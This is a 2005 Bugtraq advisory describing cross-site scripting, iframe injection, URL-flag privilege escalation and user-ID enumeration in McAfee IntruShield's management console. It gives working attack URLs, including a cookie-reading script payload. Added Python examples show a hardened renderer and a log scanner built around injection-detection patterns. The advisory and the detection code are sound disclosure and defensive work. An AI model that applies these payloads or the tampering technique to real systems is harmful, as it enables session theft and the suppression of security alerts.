List:       bugtraq
Subject:    McAfee Intrushield IPS Abuse
From:       c0ntexb () gmail ! com
Date:       2005-07-06 15:03:06
Message-ID: 20050706150306.28631.qmail () securityfocus ! com

 /*
  *****************************************************************************************************************
  $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 06 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Local / Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *****************************************************************************************************************


  McAfee IntruShield Security Management System
  http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm


  "The McAfee IntruShield Security Management System is an advanced solution for
  administering IntruShield sensor appliance deployments. The IntruShield Security
  Management System (ISM) can support both large and small network intrusion
  prevention system (IPS) deployments and can scale up to several hundred sensor
  appliances. By integrating a comprehensive set of Best-in-Class security management
  functions, the IntruShield Security Management System dramatically simplifies and
  streamlines the complexities associated with IPS configuration, policy compliance,
  and threat and response management."

  I have found some security vulnerabilities in this product whereby a user can
  elevate their privileges from a user that can only view alerts logged by remote
  sensors, to a scenario where the user can gain access to acknowledge, accept and
  delete alerts and access the Management Console. It is also possible to inject
  malicious HTML and JavaScript into the URLs and have this malicious script run on the
  client's machine, allowing for account information hijacking.

  A new version has been released to address these bugs and can be downloaded from
  their site.

*/

  Issues:
  1) Inject HTML
  2) Inject JavaScript
  3) Access privileged reports
  4) Acknowledge and delete alerts
  5) Gain access to Management Console

  Note: for issues 1 - 4, the attacker needs a valid user account.

  1) It is possible to embed HTML into the MISMS. This could potentially allow
  phishing attacks to be performed against a valid Manager account.

  https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
  domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
  topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
  http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600>
  </iframe>&severity=critical&count=1


  2) It is possible to embed JavaScript into the MISMS and have the embedded script
  execute in the security context of the user browsing the Management System.

  https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
  domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)</script>&
  resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
  Critical&severity=critical&count=1


  3) It is possible to access the restricted "Generate Reports" section of the MISMS
  and as such, a non-privileged user can gain important information regarding the
  configuration and set-up of the IP devices being managed by the Service. This can be
  achieved by simply changing the Access option from false to true.

  https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&
  selectedDomain=0&fullAccessRight=true


  4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS
  console by modifying URLs sent to the system by simply changing the Access option
  from false to true.

  https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&
  domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&
  topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
  critical&count=1

  Each change is emailed out to the administrator; however, the email only says that
  "someone" made a change.
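  The access decisions in items 3 and 4 hinge on a flag the client supplies, and items 1 and 2 on parameters reflected into the page unencoded. The following is an added example, not IntruShield code: it shows that pattern beside a server-side version in which the role comes from the session, the reflected label is HTML-encoded, and each alert action is authorised per request and logged against the named account rather than "someone". The parameter names fullAccess and thirdMenuName come from the advisory's URLs; the session layout, role names and audit-record shape are assumptions for the example.

```python
"""Added example (not IntruShield code): the access-decision pattern the advisory
describes, beside a server-side version.  Parameter names fullAccess and
thirdMenuName come from the advisory's URLs; the session layout, role names and
audit-record shape are assumptions for the example."""
import html
from urllib.parse import parse_qs

# Assumed role names: the advisory only distinguishes alert viewers from Managers.
ALERT_MANAGER_ROLES = {"manager", "admin"}
ALERT_ACTIONS = {"acknowledge", "unacknowledge", "delete"}

ACTION_CONTROLS = '<a href="ack">Acknowledge</a> <a href="delete">Delete</a>'


def render_vulnerable(query_string: str) -> str:
    """The pattern described in items 1-4: the access flag and the menu label are
    taken from the URL, so the client decides both what it may do and what HTML
    the page contains."""
    q = parse_qs(query_string, keep_blank_values=True)
    full_access = q.get("fullAccess", ["false"])[0].lower() == "true"
    label = q.get("thirdMenuName", [""])[0]          # reflected unencoded
    controls = ACTION_CONTROLS if full_access else ""
    return f"<h2>{label}</h2>{controls}"


def render_hardened(query_string: str, session: dict) -> str:
    """Access is derived from the server-side session; the fullAccess parameter is
    ignored entirely, and the reflected label is HTML-encoded."""
    q = parse_qs(query_string, keep_blank_values=True)
    full_access = session.get("role") in ALERT_MANAGER_ROLES
    label = html.escape(q.get("thirdMenuName", [""])[0], quote=True)
    controls = ACTION_CONTROLS if full_access else ""
    return f"<h2>{label}</h2>{controls}"


def perform_alert_action(session: dict, action: str, alert_id: int, audit_log: list) -> bool:
    """State-changing actions are authorised per request, not per page, and the
    audit record names the account rather than 'someone'."""
    if action not in ALERT_ACTIONS:
        raise ValueError(f"unknown alert action: {action!r}")
    allowed = session.get("role") in ALERT_MANAGER_ROLES
    audit_log.append({
        "user": session.get("user", "<unauthenticated>"),
        "role": session.get("role"),
        "action": action,
        "alert_id": alert_id,
        "allowed": allowed,
    })
    return allowed


if __name__ == "__main__":
    viewer = {"user": "viewer1", "role": "viewer"}
    tampered = "fullAccess=true&thirdMenuName=<script>alert(document.cookie)</script>"
    print(render_vulnerable(tampered))        # controls shown, script reflected
    print(render_hardened(tampered, viewer))  # no controls, script encoded
    log = []
    perform_alert_action(viewer, "delete", 17, log)
    print(log[-1])                            # denied, and attributed to viewer1
```

  The hardened renderer still shows the controls to a Manager, but only because the session says so; whether the controls are visible never matters for security, because perform_alert_action repeats the role check on every request and records who asked.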

  5) As default, all user ID values are passed in the URL in the clear, meaning that
  it is trivial for an attacker to brute force accounts until a privileged Manager
  account is found. An example of this would look similar to:

  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

  This process can be continued until a valid user ID has been found with privileges \
to access the configure screen.

  Since JavaScript can be run in the browsers of clients accessing the device, it
  would be possible to redraw the page with IFRAMEs and recreate the user login page
  to snoop usernames and passwords.
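  A detection angle on items 1 to 5, as an added example that is not part of the advisory: it scans access-log lines for access flags set to true by accounts outside the privileged list, for active markup in any parameter value (after a second percent-decode, so double-encoded payloads are caught), and for one client walking many userId values on disp.jsp. The parameter names and JSP paths are taken from the advisory's URLs; the combined-log format, the sample lines and the privileged-account list are constructed for the example.

```python
"""Added example (not IntruShield code): scan web-server access logs for the request
patterns the advisory describes.  Parameter names (fullAccess, fullAccessRight,
userId, resourceName, thirdMenuName) and the JSP paths come from the advisory;
the combined-log format, the sample lines and the privileged-account list are
constructed for the example."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/Tomcat "combined" style: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Active content in a reflected parameter (items 1 and 2).
MARKUP_RE = re.compile(
    r'<\s*/?\s*(script|iframe|img|svg|object|embed)\b|javascript:|\bon\w+\s*=', re.I
)

# Client-supplied access flags (items 3 and 4).
ACCESS_FLAGS = {"fullaccess", "fullaccessright"}

# Distinct userId values per client on disp.jsp before it counts as enumeration (item 5).
USERID_THRESHOLD = 3

# Accounts that legitimately hold full access; assumed, would come from the ISM user store.
PRIVILEGED_USERS = {"admin"}

# Constructed sample log: not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - viewer1 [06/Jul/2005:14:55:01 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&resourceName=%2FDemo%3A0%2FManager&thirdMenuName=Critical HTTP/1.1" 200 5120
10.0.0.5 - viewer1 [06/Jul/2005:14:55:09 +0000] "GET /intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true HTTP/1.1" 200 8802
10.0.0.9 - admin [06/Jul/2005:14:56:00 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&resourceName=%2FDemo%3A0%2FManager HTTP/1.1" 200 5120
10.0.0.7 - viewer2 [06/Jul/2005:14:57:13 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&resourceName=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5133
10.0.0.7 - viewer2 [06/Jul/2005:14:57:40 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&thirdMenuName=%253Ciframe%2520src%253D%2522http%253A%252F%252Fexample.invalid%252F%2522%253E HTTP/1.1" 200 5133
10.0.0.12 - - [06/Jul/2005:14:58:01 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif HTTP/1.1" 200 300
10.0.0.12 - - [06/Jul/2005:14:58:02 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif HTTP/1.1" 200 300
10.0.0.12 - - [06/Jul/2005:14:58:02 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif HTTP/1.1" 200 300
10.0.0.12 - - [06/Jul/2005:14:58:03 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif HTTP/1.1" 200 300
10.0.0.9 - admin [06/Jul/2005:14:59:30 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=7&logo=intruvert.gif HTTP/1.1" 200 300
"""


def parse_line(line: str):
    """Split one access-log line into its request fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    parts = urlsplit(req["path"])
    req["script"] = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes once; decoding again catches double-encoded payloads.
    req["params"] = {
        k.lower(): [unquote(v) for v in vs]
        for k, vs in parse_qs(parts.query, keep_blank_values=True).items()
    }
    return req


def analyse(lines, privileged_users=PRIVILEGED_USERS):
    """Return (line_no, kind, detail) findings; line_no 0 marks a cross-line finding."""
    findings = []
    userids_by_client = defaultdict(set)
    for n, line in enumerate(lines, 1):
        req = parse_line(line)
        if req is None:
            continue
        params = req["params"]
        # Items 3/4: an access flag forced to true by an account that should not hold it.
        for flag in sorted(ACCESS_FLAGS & params.keys()):
            if any(v.lower() == "true" for v in params[flag]) and req["user"] not in privileged_users:
                findings.append((n, "access-flag", f"{flag}=true from {req['ip']} as {req['user']} on {req['script']}"))
        # Items 1/2: markup or script in any parameter value.
        for name, values in params.items():
            if any(MARKUP_RE.search(v) for v in values):
                findings.append((n, "markup-injection", f"{name} carries active markup from {req['ip']} on {req['script']}"))
        # Item 5: collect userId values per client for the enumeration check below.
        if req["script"] == "disp.jsp" and "userid" in params:
            userids_by_client[req["ip"]].update(params["userid"])
    for ip, ids in userids_by_client.items():
        if len(ids) >= USERID_THRESHOLD:
            findings.append((0, "userid-enumeration", f"{ip} requested {len(ids)} distinct userId values: {sorted(ids)}"))
    return findings


if __name__ == "__main__":
    for line_no, kind, detail in analyse(SAMPLE_LOG.splitlines()):
        print(f"line {line_no:>2}  {kind:<20} {detail}")
```

  The access-flag rule only works if the log carries the authenticated account, which is exactly the correlation the "someone made a change" email lacks; a front-end proxy or the application's own request log has to supply it. The admin's single disp.jsp request stays below the enumeration threshold, while the unauthenticated client stepping through four consecutive userId values is reported once, not four times.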

